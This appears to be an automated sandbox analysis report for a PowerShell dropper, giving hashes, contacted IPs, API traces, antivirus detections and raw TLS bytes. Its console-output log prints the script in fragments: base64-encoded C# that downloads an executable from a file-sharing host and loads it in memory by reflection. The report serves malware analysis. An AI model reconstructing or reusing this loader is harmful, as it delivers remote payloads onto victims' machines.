Summary | ZeroBOX

ffffffffffffff.ps1

Generic Malware Antivirus .NET DLL PE File DLL PE32
Category Machine Started Completed
FILE s1_win7_x6401 Jan. 19, 2022, 9:44 a.m. Jan. 19, 2022, 9:48 a.m.
Size 2.2KB
Type ASCII text, with very long lines, with no line terminators
MD5 0e1653316ca12c3edbac35d9af6350a6
SHA256 5e181ecdd9349168f8bacb1a973be9a3c7420ed3f3e670e9c5ba4da6fb34af9f
CRC32 D0AC15F6
ssdeep 48:tmqaJ/xvdyEWun4E1Nh8fXX+Kby/IWfXBMifPpfMe6K19g/JGNKzwzWu0Ve:ti/xvMEr4wNWeljRMISeB3g4NiGr0Ve
Yara None matched

IP Address Status Action
144.76.136.153 Active Moloch
164.124.101.2 Active Moloch
182.162.106.32 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "btXCLQIFCzVGcuqbDRRKXPLPi" with "0" argument(s): "The underl
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: ying connection was closed: Could not establish trust relationship for the SSL/
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: TLS secure channel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\ffffffffffffff.ps1:1 char:2275
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + $whatever = "dXNpbmcgU3lzdGVtO3VzaW5nIFN5c3RlbS5JTzt1c2luZyBTeXN0ZW0uTmV0O3Vz
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: aW5nIFN5c3RlbS5SZWZsZWN0aW9uO3VzaW5nIFN5c3RlbS5UaHJlYWRpbmc7bmFtZXNwYWNlIGN4UHN
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: lUHZza0cuU3ptakNHVW1RRwp7cHVibGljIGNsYXNzIFVza05TWlNLd1pUSHdWQVZ1YVVmZHltSFQKe3
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ByaXZhdGUgY29uc3Qgc3RyaW5nIGF2cG1aTFNSRUFtR2R4cXJWd0hrU1dKV0Y9Imh0dHBzOi8vdHJhb
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: nNmZXIuc2gvZ2V0L1VVMklhcC9kZGRkZHNkc2Rzc2RzLmV4ZSI7cHJpdmF0ZSBNZW1vcnlTdHJlYW0g
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: aVphZld5UXhxV0dyT1JmQlJyc0ZwQ010YT1uZXcgTWVtb3J5U3RyZWFtKCk7W1NUQVRocmVhZF0KcHV
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ibGljIHZvaWQgYnRYQ0xRSUZDelZHY3VxYkRSUktYUExQaSgpCntDQ1ZHaU1oSVVwSVNuZHJKbGJDSE
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: Jya0RDKCk7VklxU1lJTVZBcmphTWhOSHBwa2tMWHJ0YigpO30KcHJpdmF0ZSB2b2lkIFZJcVNZSU1WQ
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: XJqYU1oTkhwcGtrTFhydGIoKQp7Ynl0ZVtdYnVmZmVyPWlaYWZXeVF4cVdHck9SZkJScnNGcENNdGEu
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: VG9BcnJheSgpO0Fzc2VtYmx5IGFzc2VtYmx5PW51bGw7aWYoRW52aXJvbm1lbnQuVmVyc2lvbi5NYWp
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: vcj49NCkKe01ldGhvZEluZm8gbWV0aG9kPVR5cGUuR2V0VHlwZSgiU3lzdGVtLlJlZmxlY3Rpb24uUn
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: VudGltZUFzc2VtYmx5IikuR2V0TWV0aG9kKCJuTG9hZEltYWdlIixCaW5kaW5nRmxhZ3MuTm9uUHVib
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: GljfEJpbmRpbmdGbGFncy5TdGF0aWMpO2Fzc2VtYmx5PShBc3NlbWJseSltZXRob2QuSW52b2tlKG51
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: bGwsbmV3IG9iamVjdFtde2J1ZmZlcixudWxsLG51bGwsbnVsbCxmYWxzZSxmYWxzZSxudWxsfSk7fWV
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: sc2UKe01ldGhvZEluZm8gbWV0aG9kPVR5cGUuR2V0VHlwZSgiU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: 1ibHkiKS5HZXRNZXRob2QoIm5Mb2FkSW1hZ2UiLEJpbmRpbmdGbGFncy5Ob25QdWJsaWN8QmluZGluZ
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: 0ZsYWdzLlN0YXRpYyk7YXNzZW1ibHk9KEFzc2VtYmx5KW1ldGhvZC5JbnZva2UobnVsbCxuZXcgb2Jq
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: ZWN0W117YnVmZmVyLG51bGwsbnVsbCxudWxsLGZhbHNlfSk7fQpvYmplY3RbXWFyZ3M9bmV3IG9iamV
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: jdFsxXTtpZihhc3NlbWJseS5FbnRyeVBvaW50LkdldFBhcmFtZXRlcnMoKS5MZW5ndGg9PTApCmFyZ3
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: M9bnVsbDthc3NlbWJseS5FbnRyeVBvaW50Lkludm9rZShudWxsLGFyZ3MpO30KcHJpdmF0ZSB2b2lkI
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: ENDVkdpTWhJVXBJU25kckpsYkNIQnJrREMoKQp7V2ViUmVxdWVzdCByZXF1ZXN0PVdlYlJlcXVlc3Qu
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: Q3JlYXRlKGF2cG1aTFNSRUFtR2R4cXJWd0hrU1dKV0YpO1dlYlJlc3BvbnNlIHJlc3BvbnNlPXJlcXV
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: lc3QuR2V0UmVzcG9uc2UoKTt1c2luZyhTdHJlYW0gd2ViX3N0cmVhbT1yZXNwb25zZS5HZXRSZXNwb2
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: 5zZVN0cmVhbSgpKQp7Ynl0ZVtdYnVmZmVyPW5ldyBieXRlWzgxOTJdO2ludCByZWFkPTA7d2hpbGUoK
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: HJlYWQ9d2ViX3N0cmVhbS5SZWFkKGJ1ZmZlciwwLGJ1ZmZlci5MZW5ndGgpKT4wKQp7aVphZld5UXhx
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: V0dyT1JmQlJyc0ZwQ010YS5Xcml0ZShidWZmZXIsMCxyZWFkKTt9fQpyZXNwb25zZS5DbG9zZSgpO31
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: 9fQ==";$dec = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($what
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: ever));Add-Type -TypeDefinition $dec;$instance = New-Object cxPsePvskG.SzmjCGUm
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: QG.UskNSZSKwZTHwVAVuaUfdymHT;$instance.btXCLQIFCzVGcuqbDRRKXPLPi <<<< ();
console_handle: 0x000001a3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001af
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001bb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05032b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05032b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05032b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05032b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05032b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05032b58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004ca040
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026af000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02239000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05711000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05576000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05577000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05578000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02246000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05750000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 2162688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06bc0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06d90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06d91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06d92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06d93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06d94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06d95000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06d96000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06d9a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06dab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06dac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06dad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05712000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05713000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05714000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05715000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05716000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2872
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05751000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3012
region_size: 917504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3012
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00640000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file c:\Users\test22\AppData\Local\Temp\fqxbg4nx.dll
file C:\Users\test22\AppData\Local\Temp\fqxbg4nx.dll
ESET-NOD32 a variant of Generik.IFSXQHM
Avast PwrSh:Dropper-AG [Drp]
AVG PwrSh:Dropper-AG [Drp]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received Y
Data received UÇ£·ºf¶Ë‡µ ó 9uÄT¤öDOWNGRD )j1«— ª¤K'ÊZ‚R¼ïüŽï!üìÀ ÿ 
Data received ¯
Data received «¨!0‚0‚ EÁPc¯RÍȀg-üHW£I0  *†H†÷  021 0 UUS10U  Let's Encrypt1 0 UR30 211104155905Z 220202155904Z010U transfer.sh0‚"0  *†H†÷ ‚0‚ ‚Ú玻=2[ cÃ`('øëêjßµÌ{‘².*¿[D1w¿ íOX´ûXŒ€öFkÌÓuôʂ‹êœi¬ÙïΣ¥Åðb»›U!ÉL–pù¥ò×¼Þ6ìn”á››»#úTžìÌ Û£jË·ø]šÙ.]Zì•÷±8ÔýßåD ²ƒts*èc­g8ЦnVóQV3ò(oEŒ§}81—æÑ2AŒO{ †ê¨ °¾4¡ªŸöMh¾s“\‡Ñîüu1ýÓKºg@Ur]»Ê¬_AËFâ=8£Lo²è•z[IÎ—ÃÀ]óWãF»–‘+øûkÕt2n&‰Ö £‚G0‚C0Uÿ 0U%0++0 Uÿ00UÜ¡Ø÷¬c~¯ã¶ji\ˆâôJ0U#0€.³·XVË®P @毝‹ÂÆ0U+I0G0!+0†http://r3.o.lencr.org0"+0†http://r3.i.lencr.org/0U0 ‚ transfer.sh0LU E0C0g 07 +‚ß0(0&+http://cps.letsencrypt.org0‚ +Öyöóñwߥ^«h‚Ol­î¸_N>ZêÍ¢¤j^Ž;À D\*s|ëãdžH0F!êDO¿ÁBk¥³ßÊéæ¡­ÝÀß” îáEBß$ê3g !“ÛºÎì®_LLœx-…žy¯Ê áKXÇæ“éûNávF¥Uëuú‘ 0µ¢‰iôó},At¾ýI¸…«òüpþmG|ëãÇ®G0E!¡uª‹'v  §PÅfg2‘݀†eÆY7'mërï J‘ÊpÃU‡ñG7¶³9¡£/I®ªf~S¹[¯Æpo€Y0  *†H†÷  ‚X8^?k¦Xì <ƒv†‹˜¬ùÊ® ¦±óŠ©¤¢–³Úƒäa¾’YÈaM×ÀºÆË³îŠC÷Ò &€ Åªžæ¼S®!µášrÏÏý7Ï/eëÃBÜÆt )Y°5Ó+N³O‡ÇW׉YâH¨þ9(Éw«jQíçÿ ,Ef0ü¿peGhàã«A _Ž)‰6 4ŸLpžVÜŒ“j„/)Û-ÿàÝ£èÑ>Yöh+ê ¡ryì)ƒàþÊùJ©.b eéÄBdPÁÖ zßtŽiõÃÆäÞªM—Z¸,K×y-‹,2Ël‰µtæëfùüèBù0‚0‚þ ‘+JÏ §SöÖ.%§_Z0  *†H†÷  0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10 200904000000Z 250915160000Z021 0 UUS10U  Let's Encrypt1 0 UR30‚"0  *†H†÷ ‚0‚ ‚»(Ìö ”ÓìU’Ãø‚ñ™¦zBˆ§]&ªµ+¹ÅL±¯ŽkùuÈ£×G”U5WŒž¨¢9õ‚<B©Nnõ;Ã.ۍÀ°\óY8çíÏiðZ ¾À”$%‡ú7q³ç¬á›ïÛä;ERE–©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m—¥@4k+Ó¼fëf4|úk‹W)™ø0]ºroûÅ­Ò†X=Çç »ñ+÷†ÜÁÚq]ÔFãÌ­%Áˆ¼`guf³ñ÷¢\æSÿ:ˆ¶G¥ÿê˜ w?SùÏåõ¦p¯c¤ÿ™³“ÜS§þH…¡i®%u»ÌRõíQ¡‹Û£‚0‚0Uÿ†0U%0++0Uÿ0ÿ0U.³·XVË®P @毝‹ÂÆ0U#0€y´Yæ{¶åäs€ˆÈXöé›n02+&0$0"+0†http://x1.i.lencr.org/0'U 00  †http://x1.c.lencr.org/0"U 00g 0  +‚ß0  *†H†÷  ‚…ÊNG>£÷…D…¼Õgx²˜c­uM–=3erT- êÃíø ¿_Ì·p·n;ö^”Þä Ÿ¦ï‹²碵<‘δí9ç|%ŠGæen?FôÙðΔ+îTμŒ'K¸Á˜/¢¯Íq‘J·È¸#{-ùW>ƒÙ3 G!x ‚'Ã*ț¹Î\òdÈÀ¾yÀOŽmD ^’».÷‹áèD)ÛY íc¹!ø&”“W eÁ "® 